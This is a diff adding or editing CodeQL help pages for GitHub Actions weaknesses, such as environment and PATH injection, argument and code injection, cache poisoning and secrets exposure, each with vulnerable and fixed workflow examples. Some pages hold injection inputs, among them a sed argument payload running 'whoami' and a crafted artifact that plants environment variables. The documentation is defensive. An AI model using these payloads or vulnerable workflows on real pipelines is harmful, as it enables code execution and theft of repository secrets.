this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. + +```bash +echo "$HOME/.local/bin" >> $GITHUB_PATH +``` + +If an attacker can control the contents of the path being assigned to the system PATH, they will be able to influence what commands are run in subsequen steps of the same job. + +## Recommendations + +- Do Not Allow Untrusted Data to Influence The System PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. + +## Examples + +### Incorrect Usage + +Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: + +```yaml +steps: + - name: Set the path + env: + BODY: ${{ github.event.comment.body }} + run: | + PATH=$(echo "$BODY" | grep -oP 'system path: \K\S+') + echo "$PATH" >> "$GITHUB_PATH" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially change the system PATH and get arbitrary command execution in subsequent steps. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md new file mode 100644 index 000000000000..1891d41fa394 --- /dev/null +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md @@ -0,0 +1,37 @@ +# Environment Path Injection + +## Description + +GitHub Actions allows to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. + +```bash +echo "$HOME/.local/bin" >> $GITHUB_PATH +``` + +If an attacker can control the contents of the path being assigned to the system PATH, they will be able to influence what commands are run in subsequen steps of the same job. + +## Recommendations + +- Do Not Allow Untrusted Data to Influence The System PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. + +## Examples + +### Incorrect Usage + +Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: + +```yaml +steps: + - name: Set the path + env: + BODY: ${{ github.event.comment.body }} + run: | + PATH=$(echo "$BODY" | grep -oP 'system path: \K\S+') + echo "$PATH" >> "$GITHUB_PATH" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially change the system PATH and get arbitrary command execution in subsequent steps. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md new file mode 100644 index 000000000000..1d33a014d4b4 --- /dev/null +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md @@ -0,0 +1,117 @@ +# Environment Variable Injection + +## Description + +GitHub Actions allows to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: + +This file should lines in the `KEY=VALUE` format: + +```bash +steps: + - name: Set the value + id: step_one + run: | + echo "action_state=yellow" >> "$GITHUB_ENV" +``` + +It is also possible to define a multiline variables by using the following format: + +``` +KEY<<{delimiter} +VALUE +VALUE +{delimiter} +``` + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" +``` + +If an attacker can control the contents of the values assigned to these variables and these are not properly sanitized, they will be able to inject additional variables by injecting new lines or `{delimiters}`. + +## Recommendations + +1. **Do Not Allow Untrusted Data to Influence Environment Variables**: + +- Avoid using untrusted data sources (e.g., artifact content) to define environment variables. +- Validate and sanitize all inputs before using them in environment settings. + +2. **Do Not Allow New Lines When Defining Single Line Environment Variables**: + +- `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + +3. **Use Unique Identifiers When Defining Multi Line Environment Variables**: + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" +``` + +## Examples + +### Example of Vulnerability + +Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: + +```yaml +steps: + - name: Set the value + id: step_one + env: + BODY: ${{ github.event.comment.body }} + run: | + REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') + echo "BODY=$REPLACED" >> "$GITHUB_ENV" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially inject new Environment variables. For example, they could write an Issue comment like: + +``` +FOO +NEW_ENV_VAR=MALICIOUS_VALUE +``` + +Likewise, if the attacker controls a file in the Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact), and the contents of that file are assigned to an environment variable such as: + +```bash +- run: | + PR_NUMBER=$(cat pr-number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV +``` + +An attacker could craft a malicious artifact that writes dangerous environment variables: + +```bash + - run: | + echo -e "666\nNEW_ENV_VAR=MALICIOUS_VALUE" > pr-number.txt + - uses: actions/upload-artifact@v4 + with: + name: pr-number + path: ./pr-number.txt +``` + +### Exploitation + +An attacker will be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) +- [GitHub Actions Exploitation: Repo Jacking and Environment Manipulation](https://www.synacktiv.com/publications/github-actions-exploitation-repo-jacking-and-environment-manipulation) diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md new file mode 100644 index 000000000000..1d33a014d4b4 --- /dev/null +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md @@ -0,0 +1,117 @@ +# Environment Variable Injection + +## Description + +GitHub Actions allows to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: + +This file should lines in the `KEY=VALUE` format: + +```bash +steps: + - name: Set the value + id: step_one + run: | + echo "action_state=yellow" >> "$GITHUB_ENV" +``` + +It is also possible to define a multiline variables by using the following format: + +``` +KEY<<{delimiter} +VALUE +VALUE +{delimiter} +``` + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" +``` + +If an attacker can control the contents of the values assigned to these variables and these are not properly sanitized, they will be able to inject additional variables by injecting new lines or `{delimiters}`. + +## Recommendations + +1. **Do Not Allow Untrusted Data to Influence Environment Variables**: + +- Avoid using untrusted data sources (e.g., artifact content) to define environment variables. +- Validate and sanitize all inputs before using them in environment settings. + +2. **Do Not Allow New Lines When Defining Single Line Environment Variables**: + +- `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + +3. **Use Unique Identifiers When Defining Multi Line Environment Variables**: + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" +``` + +## Examples + +### Example of Vulnerability + +Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: + +```yaml +steps: + - name: Set the value + id: step_one + env: + BODY: ${{ github.event.comment.body }} + run: | + REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') + echo "BODY=$REPLACED" >> "$GITHUB_ENV" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially inject new Environment variables. For example, they could write an Issue comment like: + +``` +FOO +NEW_ENV_VAR=MALICIOUS_VALUE +``` + +Likewise, if the attacker controls a file in the Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact), and the contents of that file are assigned to an environment variable such as: + +```bash +- run: | + PR_NUMBER=$(cat pr-number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV +``` + +An attacker could craft a malicious artifact that writes dangerous environment variables: + +```bash + - run: | + echo -e "666\nNEW_ENV_VAR=MALICIOUS_VALUE" > pr-number.txt + - uses: actions/upload-artifact@v4 + with: + name: pr-number + path: ./pr-number.txt +``` + +### Exploitation + +An attacker will be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) +- [GitHub Actions Exploitation: Repo Jacking and Environment Manipulation](https://www.synacktiv.com/publications/github-actions-exploitation-repo-jacking-and-environment-manipulation) diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md new file mode 100644 index 000000000000..00dc3bad472b --- /dev/null +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md @@ -0,0 +1,41 @@ +# Argument Injection in GitHub Actions + +## Description + +Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. + +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. + +## Recommendations + +When possible avoid passing user-controlled data to commands which may spawn new processes using some of their arguments. + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Examples + +### Incorrect Usage + +The following example lets a user inject an arbitrary shell command through argument injection: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.comment.body }} + run: | + cat file.txt | sed "s/BODY_PLACEHOLDER/$BODY/g" > replaced.txt +``` + +An attacker may set the body of an Issue comment to `BAR|g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation. + +## References + +- [Common Weakness Enumeration: CWE-88](https://cwe.mitre.org/data/definitions/88.html). +- [Argument Injection Explained](https://sonarsource.github.io/argument-injection-vectors/explained/) +- [Argument Injection Vectors](https://sonarsource.github.io/argument-injection-vectors/) +- [GTFOBins](https://gtfobins.github.io/) diff --git a/ql/src/Security/CWE-088/ArgumentInjectionMedium.md b/ql/src/Security/CWE-088/ArgumentInjectionMedium.md new file mode 100644 index 000000000000..00dc3bad472b --- /dev/null +++ b/ql/src/Security/CWE-088/ArgumentInjectionMedium.md @@ -0,0 +1,41 @@ +# Argument Injection in GitHub Actions + +## Description + +Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. + +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. + +## Recommendations + +When possible avoid passing user-controlled data to commands which may spawn new processes using some of their arguments. + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Examples + +### Incorrect Usage + +The following example lets a user inject an arbitrary shell command through argument injection: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.comment.body }} + run: | + cat file.txt | sed "s/BODY_PLACEHOLDER/$BODY/g" > replaced.txt +``` + +An attacker may set the body of an Issue comment to `BAR|g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation. + +## References + +- [Common Weakness Enumeration: CWE-88](https://cwe.mitre.org/data/definitions/88.html). +- [Argument Injection Explained](https://sonarsource.github.io/argument-injection-vectors/explained/) +- [Argument Injection Vectors](https://sonarsource.github.io/argument-injection-vectors/) +- [GTFOBins](https://gtfobins.github.io/) diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.md b/ql/src/Security/CWE-094/CodeInjectionCritical.md index 9939c88eb19a..cc85f68fb0d2 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.md +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.md @@ -1,16 +1,20 @@ # Code Injection in GitHub Actions +## Description + Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. -## Recommendation +## Recommendations The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. -## Example +## Examples + +### Incorrect Usage The following example lets a user inject an arbitrary shell command: @@ -40,6 +44,8 @@ jobs: echo '${{ env.BODY }}' ``` +### Correct Usage + The following example uses shell syntax to read the environment variable and will prevent the attack: ```yaml @@ -53,6 +59,22 @@ jobs: echo "$BODY" ``` +The following example uses `process.env` to read environment variables within JavaScript code. + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - uses: uses: actions/github-script@v4 + env: + BODY: ${{ github.event.issue.body }} + with: + script: | + const { BODY } = process.env + ... +``` + ## References - GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.md b/ql/src/Security/CWE-094/CodeInjectionMedium.md index 9939c88eb19a..cc85f68fb0d2 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.md +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.md @@ -1,16 +1,20 @@ # Code Injection in GitHub Actions +## Description + Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. -## Recommendation +## Recommendations The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. -## Example +## Examples + +### Incorrect Usage The following example lets a user inject an arbitrary shell command: @@ -40,6 +44,8 @@ jobs: echo '${{ env.BODY }}' ``` +### Correct Usage + The following example uses shell syntax to read the environment variable and will prevent the attack: ```yaml @@ -53,6 +59,22 @@ jobs: echo "$BODY" ``` +The following example uses `process.env` to read environment variables within JavaScript code. + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - uses: uses: actions/github-script@v4 + env: + BODY: ${{ github.event.issue.body }} + with: + script: | + const { BODY } = process.env + ... +``` + ## References - GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md new file mode 100644 index 000000000000..61fab1d8ed49 --- /dev/null +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md @@ -0,0 +1,13 @@ +# Use of Actions with known vulnerabilities + +## Description + +The security of the workflow and the repository could be compromised by GitHub Actions workflows that utilize third-party GitHub Actions with known vulnerabilities. + +## Recommendations + +Either remove the component from the workflow or upgrade it to a version that is not vulnerable. + +## References + +- [GitHub Docs: Keeping your actions up to date with Dependabot](https://docs.github.com/en/code-security/dependabot/working-with-dependabot/keeping-your-actions-up-to-date-with-dependabot) diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.md b/ql/src/Security/CWE-275/MissingActionsPermissions.md index 5c0e433c5cb5..31ddab5329d3 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.md +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.md @@ -1,9 +1,11 @@ # Actions Job and Workflow Permissions are not set -A GitHub Actions job or workflow hasn't set permissions to restrict privileges to the workflow job. -A workflow job by default without the `permissions` key or a root workflow `permissions` will run with all the permissions which can be given to a workflow. +## Description -## Recommendation +A GitHub Actions job or workflow hasn't set explicit permissions to restrict privileges to the workflow job. +A workflow job by default without the `permissions` key or a root workflow `permissions` will run with the default permissions defined at the repository level. For organizations created before February 2023, including many significant OSS projects and corporations, the default permissions grant read-write access to repositories, and new repositories inherit these old, insecure permissions. + +## Recommendations Add the `permissions` key to the job or workflow (applied to all jobs) and set the permissions to the least privilege required to complete the task: @@ -12,11 +14,18 @@ name: "My workflow" permissions: contents: read pull-requests: write +``` + +or -# or +```yaml jobs: my-job: permissions: contents: read pull-requests: write ``` + +## References + +- [Assigning permissions to jobs](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/assigning-permissions-to-jobs) diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.md b/ql/src/Security/CWE-285/ImproperAccessControl.md new file mode 100644 index 000000000000..c517ff98e585 --- /dev/null +++ b/ql/src/Security/CWE-285/ImproperAccessControl.md @@ -0,0 +1,57 @@ +# Improper Access Control + +## Description + +An authorization check may not be properly implemented, allowing an attacker to mutate the code after it has been reviewed. + +## Recommendations + +When using Label gates, make sure that the code cannot be modified after it has been reviewed and the label has been set. + +## Examples + +### Incorrect Usage + +The following example shows a job that requires the label `safe to test` to be set before running untrusted code. However, the workflow gets triggered on `synchronize` activity type and, therefore, it will get triggered every time there is a change in the Pull Request. An attacker can modify the code of the Pull Request after the code has been reviewed and the label has been set. + +```yaml +on: + pull_request_target: + types: [opened, synchronize] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd +``` + +### Correct Usage + +Make sure that the workflow only gets triggered when the label is set and use an inmutable commit (`github.event.pull_request.head.sha`) instead of a mutable reference. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.sha}} + - run: ./cmd +``` + +## References + +- [Events that trigger workflows](https://docs.github.com/en/actions/writing-workflows/choosing-when-your-workflow-runs/events-that-trigger-workflows#pull_request_target) diff --git a/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md b/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md new file mode 100644 index 000000000000..9351af5cf1e2 --- /dev/null +++ b/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md @@ -0,0 +1,52 @@ +# Excessive Secrets Exposure + +## Description + +When the workflow runner cannot determine what secrets are needed to run the workflow, it will pass all the available secrets to the runner including organization and repository secrets. This violates the least privileged principle and increases the impact of a potential vulnerability affecting the workflow. + +## Recommendations + +Only pass those secrets that are needed by the workflow. Avoid using expressions such as `toJSON(secrets)` or dynamically accessed secrets such as `secrets[format('GH_PAT_%s', matrix.env)]` since the workflow will need to receive all secrets to decide at runtime which one needs to be used. + +## Examples + +### Incorrect Usage + +```yaml +env: + ALL_SECRETS: ${{ toJSON(secrets) }} +``` + +```yaml +strategy: + matrix: + env: [PROD, DEV] +env: + GH_TOKEN: ${{ secrets[format('GH_PAT_%s', matrix.env)] }} +``` + +### Correct Usage + +```yaml +env: + NEEDED_SECRET: ${{ secrets.GH_PAT }} +``` + +```yaml +strategy: + matrix: + env: [PROD, DEV] +--- +if: matrix.env == "PROD" +env: + GH_TOKEN: ${{ secrets.GH_PAT_PROD }} +--- +if: matrix.env == "DEV" +env: + GH_TOKEN: ${{ secrets.GH_PAT_DEV }} +``` + +## References + +- [Using secrets in GitHub Actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/using-secrets-in-github-actions#using-encrypted-secrets-in-a-workflow) +- [Job uses all secrets](https://github.com/boostsecurityio/poutine/blob/main/docs/content/en/rules/job_all_secrets.md) diff --git a/ql/src/Security/CWE-312/UnmaskedSecretExposure.md b/ql/src/Security/CWE-312/UnmaskedSecretExposure.md new file mode 100644 index 000000000000..6c681856a7b3 --- /dev/null +++ b/ql/src/Security/CWE-312/UnmaskedSecretExposure.md @@ -0,0 +1,37 @@ +# Unmasked Secret Exposure + +## Description + +Secrets derived from other secrets are not know to the workflow runner and therefore not masked unless explicitly registered. + +## Recommendations + +Avoid defining non-plain secrets. For example, do not define a new secret containing a JSON object and then read properties out of it from the workflow since these read values will not be masked by the workflow runner. + +## Examples + +### Incorrect Usage + +```yaml +- env: + username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} + password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} + run: | + echo "$username" + echo "$password" +``` + +### Correct Usage + +```yaml +- env: + username: ${{ secrets.AZURE_CREDENTIALS_CLIENT_ID }} + password: ${{ secrets.AZURE_CREDENTIALS_CLIENT_SECRET }} + run: | + echo "$username" + echo "$password" +``` + +## References + +- [Using secrets in GitHub Actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/using-secrets-in-github-actions#using-encrypted-secrets-in-a-workflow) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md new file mode 100644 index 000000000000..fb927f97c68b --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md @@ -0,0 +1,83 @@ +# Cache Poisoning in GitHub Actions + +## Description + +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. + +An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: + +1. Steal the cache access token and URL +2. Fill the cache to trigger eviction of legitimate entries +3. Poison cache entries with malicious payloads +4. Achieve code execution in privileged workflows that restore the poisoned cache + +This allows lateral movement from low-privileged to high-privileged workflows within a repository. + +### Cache Structure + +In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches. + +- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`. + +- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly. + +Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`. + +## Recommendations + +1. Avoid using caching in workflows that handle sensitive operations like releases. +2. If caching must be used: + - Validate restored cache contents before use + - Use short-lived, workflow-specific cache keys + - Clear caches regularly +3. Implement strict isolation between untrusted and privileged workflow execution: +4. Never run untrusted code in the context of the default branch +5. Sign the cache value cryptographically and verify the signature before usage. + +## Examples + +### Incorrect Usage + +The following workflow is vulnerable to code injection in a non-privileged job but in the context of the default branch. + +```yaml +name: Vulnerable Workflow +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: {} + runs-on: ubuntu-latest + steps: + - run: | + echo ${{ github.event.comment.body }} +``` + +### Correct Usage + +The following workflow is not vulnerable to code injections even if it runs in the context of the default branch. + +```yaml +name: Secure Workflow +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: {} + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.comment.body }} + run: | + echo "$BODY" +``` + +## References + +- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/) +- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows) +- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md new file mode 100644 index 000000000000..c3c5970c37f5 --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md @@ -0,0 +1,101 @@ +# Cache Poisoning in GitHub Actions + +## Description + +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. + +An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: + +1. Steal the cache access token and URL +2. Fill the cache to trigger eviction of legitimate entries +3. Poison cache entries with malicious payloads +4. Achieve code execution in privileged workflows that restore the poisoned cache + +This allows lateral movement from low-privileged to high-privileged workflows within a repository. + +### Cache Structure + +In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches. + +- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`. + +- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly. + +Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`. + +## Recommendations + +1. Avoid using caching in workflows that handle sensitive operations like releases. +2. If caching must be used: + - Validate restored cache contents before use + - Use short-lived, workflow-specific cache keys + - Clear caches regularly +3. Implement strict isolation between untrusted and privileged workflow execution: +4. Never run untrusted code in the context of the default branch +5. Sign the cache value cryptographically and verify the signature before usage. + +## Examples + +### Incorrect Usage + +The following workflow is caching an attacker-controlled file (`large_file`) in the context of the default branch. + +```yaml +name: Vulnerable Workflow +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- +``` + +### Correct Usage + +The following workflow is not checking out untrusted files and, therefore, is caching trusted files only. + +```yaml +name: Secure Workflow +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- +``` + +## References + +- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/) +- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows) +- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md new file mode 100644 index 000000000000..70df52dc4635 --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md @@ -0,0 +1,85 @@ +# Cache Poisoning in GitHub Actions + +## Description + +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. + +An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: + +1. Steal the cache access token and URL +2. Fill the cache to trigger eviction of legitimate entries +3. Poison cache entries with malicious payloads +4. Achieve code execution in privileged workflows that restore the poisoned cache + +This allows lateral movement from low-privileged to high-privileged workflows within a repository. + +### Cache Structure + +In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches. + +- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`. + +- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly. + +Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`. + +## Recommendations + +1. Avoid using caching in workflows that handle sensitive operations like releases. +2. If caching must be used: + - Validate restored cache contents before use + - Use short-lived, workflow-specific cache keys + - Clear caches regularly +3. Implement strict isolation between untrusted and privileged workflow execution: +4. Never run untrusted code in the context of the default branch +5. Sign the cache value cryptographically and verify the signature before usage. + +## Examples + +### Incorrect Usage + +The following workflow runs untrusted code in a non-privileged job but in the context of the default branch. + +```yaml +name: Vulnerable Workflow +on: + pull_request_target: + branches: [main] +permissions: {} +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Run tests + run: ./run_tests.sh +``` + +### Correct Usage + +The following workflow runs untrusted code in a non-privileged job and in the context of a non-default branch. + +```yaml +name: Secure Workflow +on: + pull_request: + branches: [main] +permissions: {} +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Run tests + run: ./run_tests.sh +``` + +## References + +- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/) +- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows) +- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md new file mode 100644 index 000000000000..105fe6ecd69e --- /dev/null +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md @@ -0,0 +1,168 @@ +# Untrusted Checkout TOCTOU + +## Description + +Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. + +## Recommendations + +Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check: + +- Issue Ops: 